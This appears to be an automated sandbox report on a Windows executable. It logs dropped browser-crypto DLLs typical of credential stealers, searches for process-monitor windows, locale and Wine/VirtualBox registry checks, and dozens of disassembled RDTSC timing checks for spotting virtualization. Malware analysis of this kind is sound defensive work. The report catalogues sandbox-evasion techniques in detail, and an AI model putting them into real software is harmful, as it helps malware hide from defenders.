Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_000B9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-58404

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47AAD3 second address: 47AADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47AADA second address: 47AAF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F72110537B1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47AAF1 second address: 47AAFF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47AAFF second address: 47AB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47AB05 second address: 47AB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F7210C23A0Ah 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 489348 second address: 48939F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B5h 0x00000007 jmp 00007F72110537B9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F72110537B8h 0x00000014 pop edx 0x00000015 popad 0x00000016 push esi 0x00000017 push eax 0x00000018 jns 00007F72110537A6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48960F second address: 489620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F7210C23A06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48976E second address: 489784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F72110537AFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 489784 second address: 48979E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F7210C23A0Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48979E second address: 4897AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72110537ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4897AD second address: 4897BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F7210C23A06h 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BFE0 second address: 48BFFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C08B second address: 48C0C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 711F3485h 0x00000010 add dword ptr [ebp+122D18F4h], edi 0x00000016 lea ebx, dword ptr [ebp+1245DE68h] 0x0000001c mov dword ptr [ebp+122D18F4h], ebx 0x00000022 push eax 0x00000023 push ebx 0x00000024 jg 00007F7210C23A0Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C12C second address: 48C143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72110537B2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C143 second address: 48C14D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7210C23A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C14D second address: 48C1EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F72110537B6h 0x0000000f jmp 00007F72110537B0h 0x00000014 nop 0x00000015 add dword ptr [ebp+122D1820h], ebx 0x0000001b push 00000000h 0x0000001d mov esi, 523E798Eh 0x00000022 add dx, 11AEh 0x00000027 push 338688E8h 0x0000002c jnl 00007F72110537B8h 0x00000032 xor dword ptr [esp], 33868868h 0x00000039 sub cx, 4BA9h 0x0000003e push 00000003h 0x00000040 cmc 0x00000041 push 00000000h 0x00000043 sub esi, dword ptr [ebp+122D3712h] 0x00000049 push 00000003h 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e call 00007F72110537A8h 0x00000053 pop eax 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc eax 0x00000061 push eax 0x00000062 ret 0x00000063 pop eax 0x00000064 ret 0x00000065 mov ecx, edx 0x00000067 mov dword ptr [ebp+122D2A02h], edx 0x0000006d call 00007F72110537A9h 0x00000072 push ecx 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C1EE second address: 48C1F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C3C1 second address: 48C3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C3C5 second address: 48C40C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F7210C23A0Ch 0x00000010 popad 0x00000011 push eax 0x00000012 jnl 00007F7210C23A0Ah 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F7210C23A0Bh 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007F7210C23A0Bh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push edx 0x00000030 pop edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C40C second address: 48C415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C415 second address: 48C479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F7210C23A08h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov dl, 05h 0x00000025 push 00000003h 0x00000027 jmp 00007F7210C23A17h 0x0000002c push 00000000h 0x0000002e mov esi, dword ptr [ebp+122D382Eh] 0x00000034 push 00000003h 0x00000036 mov dword ptr [ebp+122D295Ch], eax 0x0000003c call 00007F7210C23A09h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C479 second address: 48C47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C47D second address: 48C481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C481 second address: 48C487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C487 second address: 48C48C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C48C second address: 48C49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b js 00007F72110537A6h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C49E second address: 48C4A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C4A3 second address: 48C4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jns 00007F72110537B2h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F72110537AFh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C4D6 second address: 48C4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABCCE second address: 4ABCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABCD4 second address: 4ABCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7210C23A13h 0x00000009 jbe 00007F7210C23A06h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ABFAA second address: 4ABFDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B4h 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F72110537B3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC2B4 second address: 4AC2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC2BA second address: 4AC2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC2BE second address: 4AC2DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7210C23A12h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC7B4 second address: 4AC7C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72110537ABh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC7C5 second address: 4AC7C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC7C9 second address: 4AC7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007F72110537A6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F72110537A8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A44E7 second address: 4A44EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A44EF second address: 4A4501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F72110537ABh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ACD62 second address: 4ACD67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ACD67 second address: 4ACD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD2FC second address: 4AD30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7210C23A0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD30A second address: 4AD329 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72110537B7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AD769 second address: 4AD775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7210C23A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3E56 second address: 4B3E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F72110537B0h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3E72 second address: 4B3E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3E76 second address: 4B3E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B3E7A second address: 4B3E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7210C23A13h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B34E3 second address: 4B34E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B34E7 second address: 4B34F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B46C7 second address: 4B46CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B46CB second address: 4B46D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8C02 second address: 4B8C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8C06 second address: 4B8C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9069 second address: 4B908D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F72110537B7h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B9311 second address: 4B9322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7210C23A06h 0x0000000a js 00007F7210C23A06h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC34B second address: 4BC358 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F72110537A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC358 second address: 4BC35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC3D3 second address: 4BC406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72110537B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F72110537ACh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC406 second address: 4BC418 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7210C23A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F7210C23A06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC418 second address: 4BC41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC41C second address: 4BC42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC42A second address: 4BC430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC430 second address: 4BC435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC435 second address: 4BC48D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72110537A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push ecx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F72110537A8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D35AEh] 0x00000037 push 98BC69DDh 0x0000003c pushad 0x0000003d jmp 00007F72110537B2h 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC919 second address: 4BC91D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC91D second address: 4BC92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F72110537A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCB03 second address: 4BCB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCB07 second address: 4BCB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCBE3 second address: 4BCBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD0E3 second address: 4BD0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD0E7 second address: 4BD107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7210C23A14h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD107 second address: 4BD111 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F72110537A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD233 second address: 4BD237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD698 second address: 4BD69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD69C second address: 4BD6A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD74A second address: 4BD760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F72110537ACh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BD760 second address: 4BD764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
